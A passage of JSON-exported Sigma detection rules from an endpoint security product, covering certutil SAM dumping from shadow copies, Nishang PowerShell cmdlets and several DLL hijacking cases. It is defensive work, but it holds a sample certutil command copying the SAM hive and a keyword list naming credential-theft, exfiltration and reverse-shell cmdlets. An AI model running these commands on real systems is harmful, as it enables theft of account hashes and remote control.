"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1003_002_certutil_sam_vss.yml",
"content": "title: SAM Dumped from a Volume Shadow Copy via Certutil\nid: c93e3348-ae77-418f-abad-6f51f9171f97\ndescription: |\n Detects the usage of certutil to access SAM (Security Account Manager) registry hive via a Volume Shadow Copy.\n By abusing certutil to copy the SAM database, an attacker could gain access to local accounts hashes.\n It is recommended to take immediate action to isolate the machine and identify if the copied file has been exfiltrated.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1006/\ndate: 2021/12/13\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.defense_evasion\n - attack.t1006\n - attack.s0160\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.VolumeShadowCopy\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n selection_commandline:\n # certutil.exe -f -v -encodehex \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM C:\\Windows\\TEMP\\dump\n CommandLine|contains|all:\n - '\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy'\n - 'Windows\\System32\\config\\SAM'\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c93e3348-ae77-418f-abad-6f51f9171f97",
"rule_name": "SAM Dumped from a Volume Shadow Copy via Certutil",
"rule_description": "Detects the usage of certutil to access SAM (Security Account Manager) registry hive via a Volume Shadow Copy.\nBy abusing certutil to copy the SAM database, an attacker could gain access to local accounts hashes.\nIt is recommended to take immediate action to isolate the machine and identify if the copied file has been exfiltrated.\n",
"rule_creation_date": "2021-12-13",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c9719cbf-a239-494a-8715-09a29b52eac6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092636Z",
"creation_date": "2026-03-23T11:45:34.092638Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092642Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/samratashok/nishang",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_nishang_cmd.yml",
"content": "title: Malicious PowerShell Nishang Commandlets in Command-line\nid: c9719cbf-a239-494a-8715-09a29b52eac6\ndescription: |\n Detects various malicious commandlets in PowerShell's command-line, generally associated with the Nishang framework.\n Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.\n It is recommended to investigate actions performed by attackers using the Nishang framework and to isolate infected systems.\nreferences:\n - https://github.com/samratashok/nishang\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/02/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1095\n - attack.collection\n - attack.t1115\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Nishang\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmdlet:\n CommandLine|contains:\n # Add-RegBackdoor, from Nishang\n - 'Add-RegBackdoor'\n - 'QQBkAGQALQBSAGUAZwBCAGEAYwBrAGQAbwBvAHIA'\n - 'EAZABkAC0AUgBlAGcAQgBhAGMAawBkAG8AbwByA'\n - 'BAGQAZAAtAFIAZQBnAEIAYQBjAGsAZABvAG8Acg'\n # Add-ScrnSaveBackdoor, from Nishang\n - 'Add-ScrnSaveBackdoor'\n - 'QQBkAGQALQBTAGMAcgBuAFMAYQB2AGUAQgBhAGMAawBkAG8AbwByA'\n - 'EAZABkAC0AUwBjAHIAbgBTAGEAdgBlAEIAYQBjAGsAZABvAG8Acg'\n - 'BAGQAZAAtAFMAYwByAG4AUwBhAHYAZQBCAGEAYwBrAGQAbwBvAHIA'\n # Gupt-Backdoor, from Nishang\n - 'Gupt-Backdoor'\n - 'RwB1AHAAdAAtAEIAYQBjAGsAZABvAG8Acg'\n - 'cAdQBwAHQALQBCAGEAYwBrAGQAbwBvAHIA'\n - 'HAHUAcAB0AC0AQgBhAGMAawBkAG8AbwByA'\n # Invoke-ADSBackdoor, from Nishang\n - 'Invoke-ADSBackdoor'\n - 'SQBuAHYAbwBrAGUALQBBAEQAUwBCAGEAYwBrAGQAbwBvAHIA'\n - 'kAbgB2AG8AawBlAC0AQQBEAFMAQgBhAGMAawBkAG8AbwByA'\n - 'JAG4AdgBvAGsAZQAtAEEARABTAEIAYQBjAGsAZABvAG8Acg'\n # Enabled-DuplicateToken, from Nishang\n - 'Enabled-DuplicateToken'\n - 'RQBuAGEAYgBsAGUAZAAtAEQAdQBwAGwAaQBjAGEAdABlAFQAbwBrAGUAbg'\n - 'UAbgBhAGIAbABlAGQALQBEAHUAcABsAGkAYwBhAHQAZQBUAG8AawBlAG4A'\n - 'FAG4AYQBiAGwAZQBkAC0ARAB1AHAAbABpAGMAYQB0AGUAVABvAGsAZQBuA'\n # Enabled-PsUaCme, from Nishang\n - 'Invoke-PsUaCme'\n - 'SQBuAHYAbwBrAGUALQBQAHMAVQBhAEMAbQBlA'\n - 'kAbgB2AG8AawBlAC0AUABzAFUAYQBDAG0AZQ'\n - 'JAG4AdgBvAGsAZQAtAFAAcwBVAGEAQwBtAGUA'\n # Remove-Update, from Nishang\n - 'Remove-Update'\n - 'UgBlAG0AbwB2AGUALQBVAHAAZABhAHQAZQ'\n - 'IAZQBtAG8AdgBlAC0AVQBwAGQAYQB0AGUA'\n - 'SAGUAbQBvAHYAZQAtAFUAcABkAGEAdABlA'\n # Get-LSASecret, from Nishang\n - 'Get-LSASecret'\n - 'RwBlAHQALQBMAFMAQQBTAGUAYwByAGUAdA'\n - 'cAZQB0AC0ATABTAEEAUwBlAGMAcgBlAHQA'\n - 'HAGUAdAAtAEwAUwBBAFMAZQBjAHIAZQB0A'\n # Get-PassHashes, from Nishang\n - 'Get-PassHashes'\n - 'RwBlAHQALQBQAGEAcwBzAEgAYQBzAGgAZQBzA'\n - 'cAZQB0AC0AUABhAHMAcwBIAGEAcwBoAGUAcw'\n - 'HAGUAdAAtAFAAYQBzAHMASABhAHMAaABlAHMA'\n # Show-TargetScreen, from Nishang\n - 'Show-TargetScreen'\n - 'UwBoAG8AdwAtAFQAYQByAGcAZQB0AFMAYwByAGUAZQBuA'\n - 'MAaABvAHcALQBUAGEAcgBnAGUAdABTAGMAcgBlAGUAbg'\n - 'TAGgAbwB3AC0AVABhAHIAZwBlAHQAUwBjAHIAZQBlAG4A'\n # Port-Scan, from Nishang\n - 'Port-Scan'\n - 'UABvAHIAdAAtAFMAYwBhAG4A'\n - 'AAbwByAHQALQBTAGMAYQBuA'\n - 'QAG8AcgB0AC0AUwBjAGEAbg'\n # Invoke-PoshRatHttp, from Nishang\n - 'Invoke-PoshRatHttp'\n - 'SQBuAHYAbwBrAGUALQBQAG8AcwBoAFIAYQB0AEgAdAB0AHAA'\n - 'kAbgB2AG8AawBlAC0AUABvAHMAaABSAGEAdABIAHQAdABwA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwBzAGgAUgBhAHQASAB0AHQAcA'\n # Invoke-PoshRatHttps, from Nishang\n - 'Invoke-PoshRatHttps'\n - 'SQBuAHYAbwBrAGUALQBQAG8AcwBoAFIAYQB0AEgAdAB0AHAAcw'\n - 'kAbgB2AG8AawBlAC0AUABvAHMAaABSAGEAdABIAHQAdABwAHMA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwBzAGgAUgBhAHQASAB0AHQAcABzA'\n # Invoke-PowerShellTCP, from Nishang\n - 'Invoke-PowerShellTCP'\n - 'SQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAQwBQA'\n - 'kAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAEMAUA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwAVABDAFAA'\n # Invoke-PowerShellWMI, from Nishang\n - 'Invoke-PowerShellWMI'\n - 'SQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFcATQBJA'\n - 'kAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABXAE0ASQ'\n - 'JAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwAVwBNAEkA'\n # Add-Exfiltration, from Nishang\n - 'Add-Exfiltration'\n - 'QQBkAGQALQBFAHgAZgBpAGwAdAByAGEAdABpAG8Abg'\n - 'EAZABkAC0ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4A'\n - 'BAGQAZAAtAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuA'\n # Add-Persistence, from Nishang\n - 'Add-Persistence'\n - 'QQBkAGQALQBQAGUAcgBzAGkAcwB0AGUAbgBjAGUA'\n - 'EAZABkAC0AUABlAHIAcwBpAHMAdABlAG4AYwBlA'\n - 'BAGQAZAAtAFAAZQByAHMAaQBzAHQAZQBuAGMAZQ'\n # Do-Exfiltration, from Nishang\n - 'Do-Exfiltration'\n - 'RABvAC0ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4A'\n - 'QAbwAtAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuA'\n - 'EAG8ALQBFAHgAZgBpAGwAdAByAGEAdABpAG8Abg'\n # Start-CaptureServer, from Nishang\n - 'Start-CaptureServer'\n - 'UwB0AGEAcgB0AC0AQwBhAHAAdAB1AHIAZQBTAGUAcgB2AGUAcg'\n - 'MAdABhAHIAdAAtAEMAYQBwAHQAdQByAGUAUwBlAHIAdgBlAHIA'\n - 'TAHQAYQByAHQALQBDAGEAcAB0AHUAcgBlAFMAZQByAHYAZQByA'\n # Get-ChromeDump, from Nishang\n - 'Get-ChromeDump'\n - 'RwBlAHQALQBDAGgAcgBvAG0AZQBEAHUAbQBwA'\n - 'cAZQB0AC0AQwBoAHIAbwBtAGUARAB1AG0AcA'\n - 'HAGUAdAAtAEMAaAByAG8AbQBlAEQAdQBtAHAA'\n # Get-ClipboardContents, from Nishang\n - 'Get-ClipboardContents'\n - 'RwBlAHQALQBDAGwAaQBwAGIAbwBhAHIAZABDAG8AbgB0AGUAbgB0AHMA'\n - 'cAZQB0AC0AQwBsAGkAcABiAG8AYQByAGQAQwBvAG4AdABlAG4AdABzA'\n - 'HAGUAdAAtAEMAbABpAHAAYgBvAGEAcgBkAEMAbwBuAHQAZQBuAHQAcw'\n # Invoke-Mimikittenz, from Nishang\n - 'Invoke-Mimikittenz'\n - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAaQB0AHQAZQBuAHoA'\n - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGkAdAB0AGUAbgB6A'\n - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBpAHQAdABlAG4Aeg'\n # Invoke-PowerShellIcmp, from Nishang\n - 'Invoke-PowerShellIcmp'\n - 'SQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAEkAYwBtAHAA'\n - 'kAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABJAGMAbQBwA'\n - 'JAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwASQBjAG0AcA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c9719cbf-a239-494a-8715-09a29b52eac6",
"rule_name": "Malicious PowerShell Nishang Commandlets in Command-line",
"rule_description": "Detects various malicious commandlets in PowerShell's command-line, generally associated with the Nishang framework.\nNishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.\nIt is recommended to investigate actions performed by attackers using the Nishang framework and to isolate infected systems.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-02-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1095",
"attack.t1115"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c97d7951-8f91-4019-99e7-40ca39857b16",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099072Z",
"creation_date": "2026-03-23T11:45:34.099074Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099078Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
"https://www.youtube.com/watch?v=MZ8fgAN2As8",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_svchost.yml",
"content": "title: DLL Hijacking via svchost.exe\nid: c97d7951-8f91-4019-99e7-40ca39857b16\ndescription: |\n Detects potential Windows DLL Hijacking via svchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n - https://www.youtube.com/watch?v=MZ8fgAN2As8\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'svchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wlbsctrl.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c97d7951-8f91-4019-99e7-40ca39857b16",
"rule_name": "DLL Hijacking via svchost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via svchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c98155c7-83e2-4ac0-9a7b-47dfac1b3658",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589173Z",
"creation_date": "2026-03-23T11:45:34.589177Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589185Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cleanmgr.yml",
"content": "title: DLL Hijacking via CLEANMGR.DLL.exe\nid: c98155c7-83e2-4ac0-9a7b-47dfac1b3658\ndescription: |\n Detects potential Windows DLL Hijacking via CLEANMGR.DLL.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CLEANMGR.DLL'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\propsys.dll'\n - '\\vssapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files (x86)\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c98155c7-83e2-4ac0-9a7b-47dfac1b3658",
"rule_name": "DLL Hijacking via CLEANMGR.DLL.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CLEANMGR.DLL.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c9839ae1-0d62-4732-97fd-a008d6dc892e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092111Z",
"creation_date": "2026-03-23T11:45:34.092113Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092118Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_setspn.yml",
"content": "title: DLL Hijacking via setspn.exe\nid: c9839ae1-0d62-4732-97fd-a008d6dc892e\ndescription: |\n Detects potential Windows DLL Hijacking via setspn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setspn.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c9839ae1-0d62-4732-97fd-a008d6dc892e",
"rule_name": "DLL Hijacking via setspn.exe",
"rule_description": "Detects potential Windows DLL Hijacking via setspn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c98bdba9-660b-4c44-a474-31605f8cc11a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600821Z",
"creation_date": "2026-03-23T11:45:34.600824Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600832Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_usocoreworker.yml",
"content": "title: DLL Hijacking via usocoreworker.exe\nid: c98bdba9-660b-4c44-a474-31605f8cc11a\ndescription: |\n Detects potential Windows DLL Hijacking via usocoreworker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'usocoreworker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmiso8601utils.dll'\n - '\\DMOleAutUtils.dll'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\UpdatePolicy.dll'\n - '\\winsqlite3.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c98bdba9-660b-4c44-a474-31605f8cc11a",
"rule_name": "DLL Hijacking via usocoreworker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via usocoreworker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
